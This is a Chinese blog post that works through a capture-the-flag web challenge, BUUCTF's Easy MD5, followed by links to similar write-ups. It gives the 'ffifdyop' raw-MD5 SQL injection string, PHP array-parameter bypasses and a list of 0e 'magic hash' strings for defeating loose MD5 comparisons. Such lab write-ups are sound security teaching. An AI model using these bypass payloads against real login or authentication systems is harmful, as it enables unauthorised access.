Buuctf [BJDCTF2020]Easy MD5

最新推荐文章于 2025-02-06 10:48:23 发布
最新推荐文章于 2025-02-06 10:48:23 发布
阅读量1.5k 收藏 4
点赞数 3
分类专栏: BuuCTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/125978737
版权
本文介绍了如何通过SQL注入和代码审计来绕过系统验证。利用MD5函数特性找到万能密码,同时展示了PHP数组绕过和MD5碰撞的方法。在面对强类型比较时,依然能够通过数组绕过策略完成挑战,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开题目,一片空白,尝试万能密码,sql注入,命令执行都没有任何回显,无从下手!

在这里插入图片描述

只好尝试查看开发者选项F12,或者抓包看看有没有什么提示在这里插入图片描述在这里插入图片描述

发现在响应头里有一条sql语句hint:

select * from 'admin' where password=md5($pass,true)

这里是绕过MD5进行注入,这是硬知识点,记住见到会用就好,首先我们得了解MD5()函数:在这里插入图片描述

当md5($pass,true)为true时,返回的是16位原始二进制格式的字符串,所以我们只需知道哪些字符串返回的是16位原始二进制。这里我们只需要记住当password=ffifdyop时是满足的就行:

当password=ffifdyop时
则select * from 'admin' where password=md5(ffifdyop,true)
则select * from 'admin' where password='or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
则select * from 'admin' where password='' or '6]!r,b'
则select * from 'admin' where password='' or true    >>>   恒为真
这就是永真的了,这就是一个万能密码了相当于1or 1=1#或1’ or 1#。

我们输入ffifdyop,返回了新页面,我们查看源码发现:

在这里插入图片描述

代码审计:get传参两个参数a和b,要求a不等于b并且a和b的MD5值要相同

我们这里可以MD5碰撞(MD5值以0e开头)也可以用php数组绕过,

(1)PHP数组绕过,由于哈希函数无法处理php数组,在遇到数组时返回false,我们就可以利用false==false使条件成立
/levels91.php?a[]=1&b[]=2      //a不等于b
(2)MD5碰撞
以下为常见的MD5碰撞组合
s878926199a                       //原始字符串
0e545993274517709034328855841020  //md5值
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
我们任意使用上面的两个字符串即可
/levels91.php?a=s878926199a&b=s155964671a

在这里插入图片描述

返回下一个页面

在这里插入图片描述

代码审计:post传参两个参数,要求param1强不等于param2并且param1和param2的MD5值要强相同

强类型比较,那就不能用md5碰撞了,只能用继续数组绕过,我们POST数据:

param1[]=1&param2[]=2

在这里插入图片描述

得到flag

在这里插入图片描述

5.【BUUCTF】[BJDCTF2020]Easy MD5及知识点
2401_86760082的博客
02-05 1199
在许多编程语言里,当使用 MD5 函数对数组进行处理时,其行为可能并非如预期对数组元素进行哈希计算,而是会产生一些特殊结果,利用这些特殊结果可以绕过基于 MD5 哈希值比较的验证机制,这就是 MD5 数组绕过。以 PHP 语言为例,下面详细介绍其原理、示例及防范措施。
BUUCTF [BJDCTF2020]Easy MD51 解析WP
m0_73615178的博客
01-07 1648
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
[BJDCTF2020]Easy MD5(超级详细)
weixin_73560599的博客
07-29 3735
这题涉及的知识点挺多的,包括md5($pass,true)的注入,php的弱类型比较以及强类型比较 尤其是MD5的注入 非常有意思涉及的内容挺多,开阔视野以及知识
buuctf [BJDCTF2020]Easy MD5
m_de_g的博客
11-09 1378
1.ffifdyop经过md5加密后,使用hex解码可以转换为'or'2.MySQL默认将十六进制数转换为hex();3…md5的强连接和弱连接使用数组绕过;
BUUCTF-WebEasy MD5
RexHa的博客
09-04 1461
BUUCTF-WebEasy MD5 解题
BUUCTF之[BJDCTF2020]Easy MD5
qq_40646572的博客
10-25 1246
个人感觉,给了源码的题,这个难度基本就是送分题,如果不给源码,感觉难度可以上升一点,首先我们可以使用web目录直接爆破出levell14.php页面,但可以使用refer限制来源,这样我们就可以老老实实的从leveldo4.php页面开始。难度就会上升,比较考验字典了就。(本质上来说,这道题实质就是考察md5的绕过,难度一般)。
BUUCTF[BJDCTF2020]Easy MD5
CrotZZ的博客
07-15 506
这道题主要的知识点就是关于md5绕过 首先burp抓包后再响应报文中看到hint暗示,输入的查询结果会被md5处理 这里就要用到ffifdyop了 按照大佬们的说法ffifdyop这个字符串md5后是276f722736c95d99e921722cf9ed621c,这里mysql会把hex转成ascii解释,上面这串字符ascii后是’ or’6开头,拼接后的结果就是select * from ‘admin’ where password =’ ‘ or ‘6xxxxx’,因为or的存在所以这就是个永真式,
BUUCTF [BJDCTF2020] Easy MD5
Senimo
12-08 579
BUUCTF [BJDCTF2020] Easy MD5 启动环境后,只有一个提交功能: 查看网页源码没发现什么,尝试查看请求头信息: 在Response Headers发现提示: select * from 'admin' where password=md5($pass,true) 查看PHPmd5()函数的用法: 当存在参数true时,使用原始16字符二进制格式。 查阅其他wp,查找到ffifdyop字符串经过MD5哈希之后,会变成276f722736c95d99e921722cf9ed62
buuctf [BJDCTF2020]Easy MD5 1
qq_44122254的博客
11-30 632
打开靶场链接,看见一个输入框, 题目上面有说明这个是MD5方向的解题思路,先去学习一波,搜索md5绕过,以及相关的函数,进行学习一下,现在继续回到题目上。抓包发现只有一个select 查询,hint指向md5,这时候可以学习一下,MD5绕过函数,md5($pass,true) ffifdyop这个函数,输入查询 查看源码,发现了一段代码:<!– $a = $GET[‘a’]; $b = $_GET[‘b’]; if($a != KaTeX parse error: Expected 'EOF',
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 404
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUU19 [BJDCTF2020]Easy MD51
2401_86190146的博客
02-05 1059
5.未初始化的变量:在一些情况下,未初始化的变量如果在条件判断中使用,会发出警告并且被视为 false。如果md5($pass,true)后是' ' or 1 那么整句话就是password=' ' or 1,此时必定会返回1(也就是true)1.使用数组绕过:数组经过md5加密以后结果为null,比较则相等。为假的情况:1.空字符串 比如说 " " 或者 ' '这样也不对,不知道为啥。的形式进行返回,因 MD5 函数的返回值类型为。,而 ASCII 中的字符的编号范围为。,两者的范围不对等。
2025.2.5——四、[BJDCTF2020]Easy MD5 弱比较强比较|代码审计
最新发布
2402_87387800的博客
02-06 586
题目来源:BUUCTF [BJDCTF2020]Easy MD5
buuctf Easy MD5
qq_52671379的博客
05-09 938
buuctf Easy MD5
[BUUCTF]Easy MD5
weixin_63306244的博客
06-17 766
分析发现:他的password经过md5处理过,所以是有注入的。payload:param1[]=2(随便填数字)¶m2[]=4(随便填数字)后面才知道可以直接用 [] 绕过,随后就是POST入。分析这一串注释,一眼见顶针就是md5强碰撞。然后想起来之前看的一个md5绕过的文章。上面的md5强碰撞也可以用 [] 绕过。到这里后分析,依旧还是强碰撞。随后就是设置payload。但是发现上面那种绕过不行。进入靶机看到一个输入框。发现了这一串sql语句。因为它题目提示md5
[BJDCTF2020]Easy MD5
weixin_52599204的博客
08-09 1432
这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是。单独使用相等的md5后的字符串是行不通的 这里需要使用数组。查看源码发现这里有两个get型参,同时是弱类型比较。有一个输入框,随便输入看看 抓包发现跳转。这里比较的是两个参数不相等 且md5值相等。值加密后为0e开头的字符串进行绕过。绕过,为啥可以绕过,大概意思就是。常见的md5后相等的值有一下。,则可令该SQL语句返回。这里翻了翻大佬的笔记才发现。,与万能密码的原理相同。.
buuctf- [BJDCTF2020]Easy MD5 (小宇特详解)
小宇的web博客
01-29 5900
buuctf- [BJDCTF2020]Easy MD5 (小宇特详解) 这里显示查询 这里没有回显,f12一下查看有没有有用的信息 我使用的火狐浏览器在网模块中找到了响应头 Hint:select * from ‘admin’ where password =md5($pass,ture) 这里的关键在于password=md5($pass,ture) MD5语法 标准格式 md5(string,raw) 参数 描述 string 必需。要计算的字符串。 raw 可选。规定十六进制或
[BUUCTF] BJDCTF2020 Easy MD5(学习笔记)
weixin_43919144的博客
05-01 900
做这道题目的时候,整个人都是懵的没有头绪,看了别人的wp才懂的。 知识点 md5($password,true),ffifdyop ffifdyop这个字符串经过md5加密后,返回的是原始二进制:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c。至于什么是原始二进制,这里给个送门 mysql中以数字开头的字符串会被当做整形处理例如‘6abc’=6,但是一定要加引号。 ...
BUUCTF Easy MD5
qq_54929891的博客
02-28 3211
先把提示的文档下载下来,可以发现md5里面的几个php文件 既然提示是MD5,我就没往sql注入方向想,在F12下找下有没有可利用的线索 没有什么注释可以让我们知道要输入什么 既然是leveldo4.php页面,那我们便打开一下给我们的源代码看看 拖到最底部可以看到php代码,如果GET方法上的password的值为ffifdyop,则转到levels91.php页面,那我们便直接在输入框输入ffifdyop 跳到新页面后的F12里面注释了一些代码,考的是md5的弱比较 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值